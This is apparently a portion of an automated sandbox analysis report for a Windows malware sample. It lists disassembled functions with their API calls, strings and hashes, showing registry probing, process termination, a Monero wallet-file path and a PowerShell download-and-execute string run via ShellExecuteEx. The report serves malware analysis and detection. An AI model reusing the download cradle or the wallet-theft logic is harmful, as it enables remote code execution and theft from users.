                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 422ab73a703b3314a5b4b238bdff7127408c8e11ab44004779eeb79a2325caf2
                                    • Instruction ID: 083e823f57a8c6673535bd419cfb8e568eb2ac981d81cddf61eabf93e0bd74ef
                                    • Opcode Fuzzy Hash: 422ab73a703b3314a5b4b238bdff7127408c8e11ab44004779eeb79a2325caf2
                                    • Instruction Fuzzy Hash: 5631F6B4A44218ABDB20CF54DC85BDDB7B4EB48304F1081D9FB09B7281D7706AC58F98
                                    Function 00BE856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BE85B6
                                    • wsprintfA.USER32 ref: 00BE85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BE860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE8629
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,018BDEF0,00000000,000F003F,?,00000400), ref: 00BE867C
                                    • lstrlen.KERNEL32(?), ref: 00BE8691
                                    • RegQueryValueExA.ADVAPI32(00000000,018BDCB0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BF0B3C), ref: 00BE8729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE8798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE87AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 097cd2ef5515c4f6f0557e8a9b9f1779b262cdbc32843009551c62dc4c81ebc9
                                    • Instruction ID: 086184d50cac36966955780cc050c7b6daf7416417b118924aadf1c3aeec753a
                                    • Opcode Fuzzy Hash: 097cd2ef5515c4f6f0557e8a9b9f1779b262cdbc32843009551c62dc4c81ebc9
                                    • Instruction Fuzzy Hash: F8211971A1021CAFDB24DB55DC85FE9B7B8FB48700F0081D8A649A6190DF706A85CFE4
                                    Function 00BE99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE99C5
                                    • Process32First.KERNEL32(00BDA056,00000128), ref: 00BE99D9
                                    • Process32Next.KERNEL32(00BDA056,00000128), ref: 00BE99F2
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BE9A4E
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BE9A6C
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE9A79
                                    • CloseHandle.KERNEL32(00BDA056), ref: 00BE9A88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: c7fb6372266242ed0c127a1cb488beed51412fdd8460fc6034a417c35a1c9ac1
                                    • Instruction ID: d181808a1c4a8a96e685606b18c3ab59b02041da0c7aecacc252033eeec6263a
                                    • Opcode Fuzzy Hash: c7fb6372266242ed0c127a1cb488beed51412fdd8460fc6034a417c35a1c9ac1
                                    • Instruction Fuzzy Hash: E221E975904218AFDB21DFA2DC88BDDB7B9BF49301F1041D8E509A6290D774AA88CF50
                                    Function 00BE7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE7834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,018AB700,00000000,00020119,00000000), ref: 00BE786D
                                    • RegQueryValueExA.ADVAPI32(00000000,018BDC50,00000000,00000000,?,000000FF), ref: 00BE788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BE7898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 358440336625cf47959aee6a9c0580a974829d8c359a0087f3d7dd8d77e6349b
                                    • Instruction ID: 20868193a96ae574834374cddbcc11ec2e8b5398ffe8a83c8a0bfb7c84d8b8b1
                                    • Opcode Fuzzy Hash: 358440336625cf47959aee6a9c0580a974829d8c359a0087f3d7dd8d77e6349b
                                    • Instruction Fuzzy Hash: 0701F475A48305BFE700DBD6DD49F6D77B8EB49701F104194FA45B7291EB70A904CB60
                                    Function 00BE78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE78C4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE78CB
                                    • RegOpenKeyExA.ADVAPI32(80000002,018AB700,00000000,00020119,00BE7849), ref: 00BE78EB
                                    • RegQueryValueExA.ADVAPI32(00BE7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BE790A
                                    • RegCloseKey.ADVAPI32(00BE7849), ref: 00BE7914
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 6f46914aca0867db3cd00ce541cb6cd292ca881ae3bd4e1112afa66113f56a21
                                    • Instruction ID: a839cc2d513d67ba662d39749cf5b8d055cbbe5a1c3aeb204fc3e311f318bf6e
                                    • Opcode Fuzzy Hash: 6f46914aca0867db3cd00ce541cb6cd292ca881ae3bd4e1112afa66113f56a21
                                    • Instruction Fuzzy Hash: 8B01F4B5A44309BFDB00DBD5DC49FAE77B8EF49700F104594F645B7291D7706A048BA0
                                    Function 00BDA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                    • LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                    • CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 63651cf3e3a99e48d605ad390ce20b4c9869a78dd6ca17e98c1e51879e607900
                                    • Instruction ID: 1ec0759daf3f709c9d23178270b44fe6a433cedc554656cbaacbf5bc33c72222
                                    • Opcode Fuzzy Hash: 63651cf3e3a99e48d605ad390ce20b4c9869a78dd6ca17e98c1e51879e607900
                                    • Instruction Fuzzy Hash: 9331CB74A00209EFDB14CFA5DC85BAEB7B5EB49304F108199E911B7390D774AA85CFA1
                                    Function 00BE49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,018BE1A8), ref: 00BE4A2B
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE4A51
                                    • lstrcat.KERNEL32(?,?), ref: 00BE4A70
                                    • lstrcat.KERNEL32(?,?), ref: 00BE4A84
                                    • lstrcat.KERNEL32(?,018ABFB0), ref: 00BE4A97
                                    • lstrcat.KERNEL32(?,?), ref: 00BE4AAB
                                    • lstrcat.KERNEL32(?,018BDB10), ref: 00BE4ABF
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE8F20: GetFileAttributesA.KERNEL32(00000000,?,00BD1B94,?,?,00BF577C,?,?,00BF0E22), ref: 00BE8F2F
                                      • Part of subcall function 00BE47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BE47D0
                                      • Part of subcall function 00BE47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE47D7
                                      • Part of subcall function 00BE47C0: wsprintfA.USER32 ref: 00BE47F6
                                      • Part of subcall function 00BE47C0: FindFirstFileA.KERNEL32(?,?), ref: 00BE480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 3b9986dbfcf7185ecbcb8d80fcecec7b6f3a01e0014245121687b396f6b3ccba
                                    • Instruction ID: 7f88a802a5cc6926c02edb26af04ebc3ded73f21b20e6a089614760afeedc9a4
                                    • Opcode Fuzzy Hash: 3b9986dbfcf7185ecbcb8d80fcecec7b6f3a01e0014245121687b396f6b3ccba
                                    • Instruction Fuzzy Hash: 363150F29002086BDB14EBB1DC85EDD737CAB58700F4049C9B249A6051EF74A78D8BA4
                                    Function 00BE2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BE2FD5
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BE2F14
                                    • ')", xrefs: 00BE2F03
                                    • <, xrefs: 00BE2F89
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BE2F54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 85b0a3709e545cb44461120938171d15f24d4ea20c34f1aa0fa557efdefc9bf0
                                    • Instruction ID: ade4766c29bb61635faadf00932b28c1829bcd711d323332f25c01d5a0982e05
                                    • Opcode Fuzzy Hash: 85b0a3709e545cb44461120938171d15f24d4ea20c34f1aa0fa557efdefc9bf0
                                    • Instruction Fuzzy Hash: E341FA71D102489ADB14FFA1CCA2BEDBBF9AF14300F4144A9E116671A2EF743A49CF91
                                    Function 00BE4300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,018BD970,00000000,00020119,?), ref: 00BE4344
                                    • RegQueryValueExA.ADVAPI32(?,018BE118,00000000,00000000,00000000,000000FF), ref: 00BE4368
                                    • RegCloseKey.ADVAPI32(?), ref: 00BE4372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE4397
                                    • lstrcat.KERNEL32(?,018BE130), ref: 00BE43AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 43c8524e1b7fe9097fd854d060decb80f6c5dd93df45ae9b1682cb9fb7e8e71b
                                    • Instruction ID: 6efba38d7670ae6bfdaed9c49808bab7230c149a8709321e96350a5430129572
                                    • Opcode Fuzzy Hash: 43c8524e1b7fe9097fd854d060decb80f6c5dd93df45ae9b1682cb9fb7e8e71b
                                    • Instruction Fuzzy Hash: 204186B6900108AFDB14EBA0EC46FEE737CAB9D700F048999B61556181EB75678C8BA1
                                    Function 00C4CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
